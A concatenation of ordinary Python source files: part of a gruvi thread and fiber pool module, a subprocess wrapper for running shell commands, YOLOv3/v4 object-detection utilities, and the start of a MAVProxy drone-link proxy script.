fiber.cancel()
def _start_work(self, fut):
fut.set_running(True)
fut.add_done_callback(self._cancel_fiber, fut, self._current_worker())
Pool = FiberPool
class ThreadPool(PoolBase):
"""A pool that uses thread workers."""
def __init__(self, *args, **kwargs):
# Provided in order not to repeat the PoolBase.__init__ doc string.
super(ThreadPool, self).__init__(*args, **kwargs)
def _current_worker(self):
return threading.current_thread()
def _create_worker(self, name):
thread = threading.Thread(target=self._worker_main, name=name)
# Mark the threads in the pool as daemonic. This allows the program to
# exit if the user did not close() the pool. This is useful especially
# because there's implicitly created pools (the IO and thread pool) and
# we cannot expect the user to close those.
thread.daemon = True
thread.start()
return thread
def _start_work(self, fut):
fut.set_running(False)
# When constructing a pool it doesn't start any workers until they are needed.
# This makes it OK to instantiate the pools ahead of time.
_io_pool = ThreadPool(20, name='Io')
_cpu_pool = ThreadPool(len(pyuv.util.cpu_info()), name='Cpu')
def get_io_pool():
"""Return the thread pool for IO tasks.
By default there is one IO thread pool per application, which is shared
with all threads.
"""
return _io_pool
def get_cpu_pool():
"""Return the thread pool for CPU intenstive tasks.
By default there is one CPU thread pool per application, which it is shared
with all threads.
"""
return _cpu_pool
def blocking(func, *args, **kwargs):
"""Run a function that uses blocking IO.
The function is run in the IO thread pool.
"""
pool = get_io_pool()
fut = pool.submit(func, *args, **kwargs)
return fut.result()
@switchpoint
def _wait(pending, timeout):
# An iterator/generator that waits for objects in the list *pending*,
# yielding them as they become ready. The pending list is mutated.
done = []
have_items = Event()
def callback(i):
done.append(pending[i])
pending[i] = None
have_items.set()
handles = [pending[i].add_done_callback(callback, i) for i in range(len(pending))]
if timeout is not None:
end_time = time.time() + timeout
try:
while pending:
if timeout is not None:
timeout = max(0, end_time - time.time())
if not have_items.wait(timeout):
raise Timeout('timeout waiting for objects')
i = 0
while i < len(done):
yield done[i]
i += 1
del done[:]
have_items.clear()
finally:
for i in range(len(pending)):
if pending[i] is not None:
pending[i].remove_done_callback(handles[i])
@switchpoint
def as_completed(objects, count=None, timeout=None):
"""Wait for one or more waitable objects, yielding them as they become
ready.
This is the iterator/generator version of :func:`wait`.
"""
for obj in objects:
if not hasattr(obj, 'add_done_callback'):
raise TypeError('Expecting sequence of waitable objects')
if count is None:
count = len(objects)
if count < 0 or count > len(objects):
raise ValueError('count must be between 0 and len(objects)')
if count == 0:
return
pending = list(objects)
for obj in _wait(pending, timeout):
yield obj
count -= 1
if count == 0:
break
@switchpoint
def wait(objects, count=None, timeout=None):
"""Wait for one or more waitable objects.
This method waits until *count* elements from the sequence of waitable
objects *objects* have become ready. If *count* is ``None`` (the default),
then wait for all objects to become ready.
What "ready" is means depends on the object type. A waitable object is a
objects that implements the ``add_done_callback()`` and
``remove_done_callback`` methods. This currently includes:
* :class:`~gruvi.Event` - an event is ready when its internal flag is set.
* :class:`~gruvi.Future` - a future is ready when its result is set.
* :class:`~gruvi.Fiber` - a fiber is ready when has terminated.
* :class:`~gruvi.Process` - a process is ready when the child has exited.
"""
for obj in objects:
if not hasattr(obj, 'add_done_callback'):
raise TypeError('Expecting sequence of waitable objects')
if count is None:
count = len(objects)
if count < 0 or count > len(objects):
raise ValueError('count must be between 0 and len(objects)')
if count == 0:
return [], objects
pending = list(objects)
done = []
try:
for obj in _wait(pending, timeout):
done.append(obj)
if len(done) == count:
break
except Timeout:
pass
return done, list(filter(bool, pending))
|
process.py | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module is used to execute the shell script.
"""
import os
import subprocess
import threading
class Process(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
def process_cmd(self):
try:
self.process = subprocess.Popen("exec " + self.cmd, bufsize=0, shell=True, stdout=subprocess.PIPE)
return self.process
except Exception:
return None
def process_cmd_asyc_end(self, key_word):
self.stop_thread.set()
stop_cmd = "ps -ef | grep '" + key_word + "' | grep -v grep | awk '{print $2}' | xargs kill"
print(stop_cmd)
os.popen(stop_cmd)
def process_cmd_asyc(self):
self.stop_thread = threading.Event()
self.process = subprocess.Popen(self.cmd,
bufsize=0,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True)
print(self.process.pid)
proc_thread = threading.Thread(target=self.read, args=(self.process,))
proc_thread.start()
def read(self, process):
while not self.stop_thread.is_set():
output = process.stdout.readline().decode("UTF-8")
# TODO: should add the logic to record the log info here. This will be addressed by issue ID #33
print(output.strip())
if output == "" and self.process.poll() is not None:
break
def get_process(self):
return self.process
def get_process_result(self):
self.process_cmd()
return self.process.communicate()[0].decode("UTF-8")
def get_process_list(self):
self.process_cmd()
res = self.process.communicate()[0].decode("UTF-8")
return res if res is not None else ""
def get_process_content(self):
self.process_cmd()
return self.process.check_out()
@staticmethod
def execute_command(cmd):
process = subprocess.Popen("exec " + cmd, bufsize=0, shell=True, stdout=subprocess.PIPE)
process.communicate()
|
utils.py | #================================================================
#
# File name : utils.py
# Author : PyLessons
# Created date: 2020-09-27
# Website : https://pylessons.com/
# GitHub : https://github.com/pythonlessons/TensorFlow-2.x-YOLOv3
# Description : additional yolov3 and yolov4 functions
#
#================================================================
from multiprocessing import Process, Queue, Pipe
import cv2
import time
import random
import colorsys
import numpy as np
import tensorflow as tf
from yolov3.configs import *
from yolov3.yolov4 import *
from tensorflow.python.saved_model import tag_constants
def load_yolo_weights(model, weights_file):
tf.keras.backend.clear_session() # used to reset layer names
# load Darknet original weights to TensorFlow model
if YOLO_TYPE == "yolov3":
range1 = 75 if not TRAIN_YOLO_TINY else 13
range2 = [58, 66, 74] if not TRAIN_YOLO_TINY else [9, 12]
if YOLO_TYPE == "yolov4":
range1 = 110 if not TRAIN_YOLO_TINY else 21
range2 = [93, 101, 109] if not TRAIN_YOLO_TINY else [17, 20]
with open(weights_file, 'rb') as wf:
major, minor, revision, seen, _ = np.fromfile(wf, dtype=np.int32, count=5)
j = 0
for i in range(range1):
if i > 0:
conv_layer_name = 'conv2d_%d' %i
else:
conv_layer_name = 'conv2d'
if j > 0:
bn_layer_name = 'batch_normalization_%d' %j
else:
bn_layer_name = 'batch_normalization'
conv_layer = model.get_layer(conv_layer_name)
filters = conv_layer.filters
k_size = conv_layer.kernel_size[0]
in_dim = conv_layer.input_shape[-1]
if i not in range2:
# darknet weights: [beta, gamma, mean, variance]
bn_weights = np.fromfile(wf, dtype=np.float32, count=4 * filters)
# tf weights: [gamma, beta, mean, variance]
bn_weights = bn_weights.reshape((4, filters))[[1, 0, 2, 3]]
bn_layer = model.get_layer(bn_layer_name)
j += 1
else:
conv_bias = np.fromfile(wf, dtype=np.float32, count=filters)
# darknet shape (out_dim, in_dim, height, width)
conv_shape = (filters, in_dim, k_size, k_size)
conv_weights = np.fromfile(wf, dtype=np.float32, count=np.product(conv_shape))
# tf shape (height, width, in_dim, out_dim)
conv_weights = conv_weights.reshape(conv_shape).transpose([2, 3, 1, 0])
if i not in range2:
conv_layer.set_weights([conv_weights])
bn_layer.set_weights(bn_weights)
else:
conv_layer.set_weights([conv_weights, conv_bias])
assert len(wf.read()) == 0, 'failed to read all data'
def Load_Yolo_model():
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
print(f'GPUs {gpus}')
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: pass
if YOLO_FRAMEWORK == "tf": # TensorFlow detection
if YOLO_TYPE == "yolov4":
Darknet_weights = YOLO_V4_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V4_WEIGHTS
if YOLO_TYPE == "yolov3":
Darknet_weights = YOLO_V3_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V3_WEIGHTS
if YOLO_CUSTOM_WEIGHTS == False:
print("Loading Darknet_weights from:", Darknet_weights)
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=YOLO_COCO_CLASSES)
load_yolo_weights(yolo, Darknet_weights) # use Darknet weights
else:
print("Loading custom weights from:", YOLO_CUSTOM_WEIGHTS)
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=TRAIN_CLASSES)
yolo.load_weights(f"./checkpoints/{TRAIN_MODEL_NAME}") # use custom weights
elif YOLO_FRAMEWORK == "trt": # TensorRT detection
saved_model_loaded = tf.saved_model.load(YOLO_CUSTOM_WEIGHTS, tags=[tag_constants.SERVING])
signature_keys = list(saved_model_loaded.signatures.keys())
yolo = saved_model_loaded.signatures['serving_default']
return yolo
def image_preprocess(image, target_size, gt_boxes=None):
ih, iw = target_size
h, w, _ = image.shape
scale = min(iw/w, ih/h)
nw, nh = int(scale * w), int(scale * h)
image_resized = cv2.resize(image, (nw, nh))
image_paded = np.full(shape=[ih, iw, 3], fill_value=128.0)
dw, dh = (iw - nw) // 2, (ih-nh) // 2
image_paded[dh:nh+dh, dw:nw+dw, :] = image_resized
image_paded = image_paded / 255.
if gt_boxes is None:
return image_paded
else:
gt_boxes[:, [0, 2]] = gt_boxes[:, [0, 2]] * scale + dw
gt_boxes[:, [1, 3]] = gt_boxes[:, [1, 3]] * scale + dh
return image_paded, gt_boxes
def draw_bbox(image, bboxes, CLASSES=YOLO_COCO_CLASSES, show_label=True, show_confidence = True, Text_colors=(255,255,0), rectangle_colors='', tracking=False):
NUM_CLASS = read_class_names(CLASSES)
num_classes = len(NUM_CLASS)
image_h, image_w, _ = image.shape
hsv_tuples = [(1.0 * x / num_classes, 1., 1.) for x in range(num_classes)]
#print("hsv_tuples", hsv_tuples)
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
random.seed(0)
random.shuffle(colors)
random.seed(None)
for i, bbox in enumerate(bboxes):
coor = np.array(bbox[:4], dtype=np.int32)
score = bbox[4]
class_ind = int(bbox[5])
bbox_color = rectangle_colors if rectangle_colors != '' else colors[class_ind]
bbox_thick = int(0.6 * (image_h + image_w) / 1000)
if bbox_thick < 1: bbox_thick = 1
fontScale = 0.75 * bbox_thick
(x1, y1), (x2, y2) = (coor[0], coor[1]), (coor[2], coor[3])
# put object rectangle
cv2.rectangle(image, (x1, y1), (x2, y2), bbox_color, bbox_thick*2)
if show_label:
# get text label
score_str = " {:.2f}".format(score) if show_confidence else ""
if tracking: score_str = " "+str(score)
try:
label = "{}".format(NUM_CLASS[class_ind]) + score_str
except KeyError:
print("You received KeyError, this might be that you are trying to use yolo original weights")
print("while using custom classes, if using custom model in configs.py set YOLO_CUSTOM_WEIGHTS = True")
# get text size
(text_width, text_height), baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, thickness=bbox_thick)
# put filled text rectangle
cv2.rectangle(image, (x1, y1), (x1 + text_width, y1 - text_height - baseline), bbox_color, thickness=cv2.FILLED)
# put text above rectangle
cv2.putText(image, label, (x1, y1-4), cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, Text_colors, bbox_thick, lineType=cv2.LINE_AA)
return image
def bboxes_iou(boxes1, boxes2):
boxes1 = np.array(boxes1)
boxes2 = np.array(boxes2)
boxes1_area = (boxes1[..., 2] - boxes1[..., 0]) * (boxes1[..., 3] - boxes1[..., 1])
boxes2_area = (boxes2[..., 2] - boxes2[..., 0]) * (boxes2[..., 3] - boxes2[..., 1])
left_up = np.maximum(boxes1[..., :2], boxes2[..., :2])
right_down = np.minimum(boxes1[..., 2:], boxes2[..., 2:])
inter_section = np.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = boxes1_area + boxes2_area - inter_area
ious = np.maximum(1.0 * inter_area / union_area, np.finfo(np.float32).eps)
return ious
def nms(bboxes, iou_threshold, sigma=0.3, method='nms'):
"""
:param bboxes: (xmin, ymin, xmax, ymax, score, class)
Note: soft-nms, https://arxiv.org/pdf/1704.04503.pdf
https://github.com/bharatsingh430/soft-nms
"""
classes_in_img = list(set(bboxes[:, 5]))
best_bboxes = []
for cls in classes_in_img:
cls_mask = (bboxes[:, 5] == cls)
cls_bboxes = bboxes[cls_mask]
# Process 1: Determine whether the number of bounding boxes is greater than 0
while len(cls_bboxes) > 0:
# Process 2: Select the bounding box with the highest score according to socre order A
max_ind = np.argmax(cls_bboxes[:, 4])
best_bbox = cls_bboxes[max_ind]
best_bboxes.append(best_bbox)
cls_bboxes = np.concatenate([cls_bboxes[: max_ind], cls_bboxes[max_ind + 1:]])
# Process 3: Calculate this bounding box A and
# Remain all iou of the bounding box and remove those bounding boxes whose iou value is higher than the threshold
iou = bboxes_iou(best_bbox[np.newaxis, :4], cls_bboxes[:, :4])
weight = np.ones((len(iou),), dtype=np.float32)
assert method in ['nms', 'soft-nms']
if method == 'nms':
iou_mask = iou > iou_threshold
weight[iou_mask] = 0.0
if method == 'soft-nms':
weight = np.exp(-(1.0 * iou ** 2 / sigma))
cls_bboxes[:, 4] = cls_bboxes[:, 4] * weight
score_mask = cls_bboxes[:, 4] > 0.
cls_bboxes = cls_bboxes[score_mask]
return best_bboxes
def postprocess_boxes(pred_bbox, original_image, input_size, score_threshold):
valid_scale=[0, np.inf]
pred_bbox = np.array(pred_bbox)
pred_xywh = pred_bbox[:, 0:4]
pred_conf = pred_bbox[:, 4]
pred_prob = pred_bbox[:, 5:]
# 1. (x, y, w, h) --> (xmin, ymin, xmax, ymax)
pred_coor = np.concatenate([pred_xywh[:, :2] - pred_xywh[:, 2:] * 0.5,
pred_xywh[:, :2] + pred_xywh[:, 2:] * 0.5], axis=-1)
# 2. (xmin, ymin, xmax, ymax) -> (xmin_org, ymin_org, xmax_org, ymax_org)
org_h, org_w = original_image.shape[:2]
resize_ratio = min(input_size / org_w, input_size / org_h)
dw = (input_size - resize_ratio * org_w) / 2
dh = (input_size - resize_ratio * org_h) / 2
pred_coor[:, 0::2] = 1.0 * (pred_coor[:, 0::2] - dw) / resize_ratio
pred_coor[:, 1::2] = 1.0 * (pred_coor[:, 1::2] - dh) / resize_ratio
# 3. clip some boxes those are out of range
pred_coor = np.concatenate([np.maximum(pred_coor[:, :2], [0, 0]),
np.minimum(pred_coor[:, 2:], [org_w - 1, org_h - 1])], axis=-1)
invalid_mask = np.logical_or((pred_coor[:, 0] > pred_coor[:, 2]), (pred_coor[:, 1] > pred_coor[:, 3]))
pred_coor[invalid_mask] = 0
# 4. discard some invalid boxes
bboxes_scale = np.sqrt(np.multiply.reduce(pred_coor[:, 2:4] - pred_coor[:, 0:2], axis=-1))
scale_mask = np.logical_and((valid_scale[0] < bboxes_scale), (bboxes_scale < valid_scale[1]))
# 5. discard boxes with low scores
classes = np.argmax(pred_prob, axis=-1)
scores = pred_conf * pred_prob[np.arange(len(pred_coor)), classes]
score_mask = scores > score_threshold
mask = np.logical_and(scale_mask, score_mask)
coors, scores, classes = pred_coor[mask], scores[mask], classes[mask]
return np.concatenate([coors, scores[:, np.newaxis], classes[:, np.newaxis]], axis=-1)
def detect_image(Yolo, image_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
original_image = cv2.imread(image_path)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
if output_path != '': cv2.imwrite(output_path, image)
if show:
# Show the image
cv2.imshow("predicted image", image)
# Load and hold the image
cv2.waitKey(0)
# To close the window after the required kill value was provided
cv2.destroyAllWindows()
return image
def Predict_bbox_mp(Frames_data, Predicted_data, Processing_times):
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: print("RuntimeError in tf.config.experimental.list_physical_devices('GPU')")
Yolo = Load_Yolo_model()
times = []
while True:
if Frames_data.qsize()>0:
image_data = Frames_data.get()
t1 = time.time()
Processing_times.put(time.time())
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
Predicted_data.put(pred_bbox)
def postprocess_mp(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime):
times = []
while True:
if Predicted_data.qsize()>0:
pred_bbox = Predicted_data.get()
if realtime:
while original_frames.qsize() > 1:
original_image = original_frames.get()
else:
original_image = original_frames.get()
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
times.append(time.time()-Processing_times.get())
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
#print("Time: {:.2f}ms, Final FPS: {:.1f}".format(ms, fps))
Processed_frames.put(image)
def Show_Image_mp(Processed_frames, show, Final_frames):
while True:
if Processed_frames.qsize()>0:
image = Processed_frames.get()
Final_frames.put(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
# detect from webcam
def detect_video_realtime_mp(video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors='', realtime=False):
if realtime:
vid = cv2.VideoCapture(0)
else:
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
no_of_frames = int(vid.get(cv2.CAP_PROP_FRAME_COUNT))
original_frames = Queue()
Frames_data = Queue()
Predicted_data = Queue()
Processed_frames = Queue()
Processing_times = Queue()
Final_frames = Queue()
p1 = Process(target=Predict_bbox_mp, args=(Frames_data, Predicted_data, Processing_times))
p2 = Process(target=postprocess_mp, args=(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime))
p3 = Process(target=Show_Image_mp, args=(Processed_frames, show, Final_frames))
p1.start()
p2.start()
p3.start()
while True:
ret, img = vid.read()
if not ret:
break
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_frames.put(original_image)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
Frames_data.put(image_data)
while True:
if original_frames.qsize() == 0 and Frames_data.qsize() == 0 and Predicted_data.qsize() == 0 and Processed_frames.qsize() == 0 and Processing_times.qsize() == 0 and Final_frames.qsize() == 0:
p1.terminate()
p2.terminate()
p3.terminate()
break
elif Final_frames.qsize()>0:
image = Final_frames.get()
if output_path != '': out.write(image)
cv2.destroyAllWindows()
def detect_video(Yolo, video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times, times_2 = [], []
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, img = vid.read()
try:
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
t3 = time.time()
times.append(t2-t1)
times_2.append(t3-t1)
times = times[-20:]
times_2 = times_2[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
fps2 = 1000 / (sum(times_2)/len(times_2)*1000)
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
print("Time: {:.2f}ms, Detection FPS: {:.1f}, total FPS: {:.1f}".format(ms, fps, fps2))
if output_path != '': out.write(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
# detect from webcam
def detect_realtime(Yolo, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times = []
vid = cv2.VideoCapture(0)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, frame = vid.read()
try:
original_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
original_frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_frame), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_frame, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
times.append(t2-t1)
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
print("Time: {:.2f}ms, {:.1f} FPS".format(ms, fps))
frame = draw_bbox(original_frame, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_frame, bboxes, read_class_names(CLASSES))
image = cv2.putText(frame, "Time: {:.1f}FPS".format(fps), (0, 30),
cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
if output_path != '': out.write(frame)
if show:
cv2.imshow('output', frame)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
|
mavproxy2.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
'''
mavproxy - a MAVLink proxy program
Copyright Andrew Tridgell 2011
Released under the GNU GPL version 3 or later
'''
import sys, os, time, socket, signal
reload (sys)
sys.setdefaultencoding('utf-8')
import fnmatch, errno, threading
import serial, Queue, select
import traceback
import select
import shlex
import datetime
import os
from MAVProxy.modules.lib import textconsole
from MAVProxy.modules.lib import rline
from MAVProxy.modules.lib import mp_module
from MAVProxy.modules.lib import dumpstacks
# adding all this allows pyinstaller to build a working windows executable
# note that using --hidden-import does not work for these modules
try:
from multiprocessing import freeze_support
from pymavlink import mavwp, mavutil
import matplotlib, HTMLParser
try:
import readline
except ImportError:
import pyreadline as readline
except Exception:
pass
if __name__ == '__main__':
freeze_support()
class MPStatus(object):
'''hold status information about the mavproxy'''
def __init__(self):
self.gps = None
self.msgs = {}
self.msg_count = {}
self.counters = {'MasterIn' : [], 'MasterOut' : 0, 'FGearIn' : 0, 'FGearOut' : 0, 'Slave' : 0}
self.setup_mode = opts.setup
self.mav_error = 0
self.altitude = 0
self.last_altitude_announce = 0.0
self.last_distance_announce = 0.0
self.exit = False
self.flightmode = 'MAV'
self.last_mode_announce = 0
self.logdir = None
self.last_heartbeat = 0
self.last_message = 0
self.heartbeat_error = False
self.last_apm_msg = None
self.last_apm_msg_time = 0
self.highest_msec = 0
self.have_gps_lock = False
self.lost_gps_lock = False
self.last_gps_lock = 0
self.watch = None
self.last_streamrate1 = -1
self.last_streamrate2 = -1
self.last_seq = 0
self.armed = False
def show(self, f, pattern=None):
'''write status to status.txt'''
if pattern is None:
f.write('Counters: ')
for c in self.counters:
f.write('%s:%s ' % (c, self.counters[c]))
f.write('\n')
f.write('MAV Errors: %u\n' % self.mav_error)
f.write(str(self.gps)+'\n')
for m in sorted(self.msgs.keys()):
#print m
if pattern is not None and not fnmatch.fnmatch(str(m).upper(), pattern.upper()):
continue
f.write("%u: %s\n" % (self.msg_count[m], str(self.msgs[m])))
def write(self):
'''write status to status.txt'''
f = open('status.txt', mode='w')
self.show(f)
f.close()
def say_text(text, priority='important'):
'''text output - default function for say()'''
mpstate.console.writeln(text)
def say(text, priority='important'):
'''text and/or speech output'''
mpstate.functions.say(text, priority)
def add_input(cmd, immediate=False):
'''add some command input to be processed'''
if immediate:
process_stdin(cmd)
else:
mpstate.input_queue.put(cmd)
class MAVFunctions(object):
'''core functions available in modules'''
def __init__(self):
self.process_stdin = add_input
self.param_set = param_set
self.get_mav_param = get_mav_param
self.say = say_text
# input handler can be overridden by a module
self.input_handler = None
class MPState(object):
'''holds state of mavproxy'''
def __init__(self):
self.bsp_dir = ""
self.bsp_name = ""
self.app_dir = ""
self.app_name = ""
self.ssid = ""
self.mac = ""
self.console = textconsole.SimpleConsole()
self.map = None
self.map_functions = {}
self.vehicle_type = None
self.vehicle_name = None
from MAVProxy.modules.lib.mp_settings import MPSettings, MPSetting
self.settings = MPSettings(
[ MPSetting('link', int, 1, 'Primary Link', tab='Link', range=(0,4), increment=1),
MPSetting('streamrate', int, 4, 'Stream rate link1', range=(-1,20), increment=1),
MPSetting('streamrate2', int, 4, 'Stream rate link2', range=(-1,20), increment=1),
MPSetting('heartbeat', int, 1, 'Heartbeat rate', range=(0,5), increment=1),
MPSetting('mavfwd', bool, True, 'Allow forwarded control'),
MPSetting('mavfwd_rate', bool, False, 'Allow forwarded rate control'),
MPSetting('shownoise', bool, True, 'Show non-MAVLink data'),
MPSetting('baudrate', int, opts.baudrate, 'baudrate for new links', range=(0,10000000), increment=1),
MPSetting('rtscts', bool, opts.rtscts, 'enable flow control'),
MPSetting('select_timeout', float, 0.01, 'select timeout'),
MPSetting('altreadout', int, 10, 'Altitude Readout',
range=(0,100), increment=1, tab='Announcements'),
MPSetting('distreadout', int, 200, 'Distance Readout', range=(0,10000), increment=1),
MPSetting('moddebug', int, opts.moddebug, 'Module Debug Level', range=(0,3), increment=1, tab='Debug'),
MPSetting('compdebug', int, 0, 'Computation Debug Mask', range=(0,3), tab='Debug'),
MPSetting('flushlogs', bool, False, 'Flush logs on every packet'),
MPSetting('requireexit', bool, False, 'Require exit command'),
MPSetting('wpupdates', bool, True, 'Announce waypoint updates'),
MPSetting('basealt', int, 0, 'Base Altitude', range=(0,30000), increment=1, tab='Altitude'),
MPSetting('wpalt', int, 100, 'Default WP Altitude', range=(0,10000), increment=1),
MPSetting('rallyalt', int, 90, 'Default Rally Altitude', range=(0,10000), increment=1),
MPSetting('terrainalt', str, 'Auto', 'Use terrain altitudes', choice=['Auto','True','False']),
MPSetting('rally_breakalt', int, 40, 'Default Rally Break Altitude', range=(0,10000), increment=1),
MPSetting('rally_flags', int, 0, 'Default Rally Flags', range=(0,10000), increment=1),
MPSetting('source_system', int, 255, 'MAVLink Source system', range=(0,255), increment=1, tab='MAVLink'),
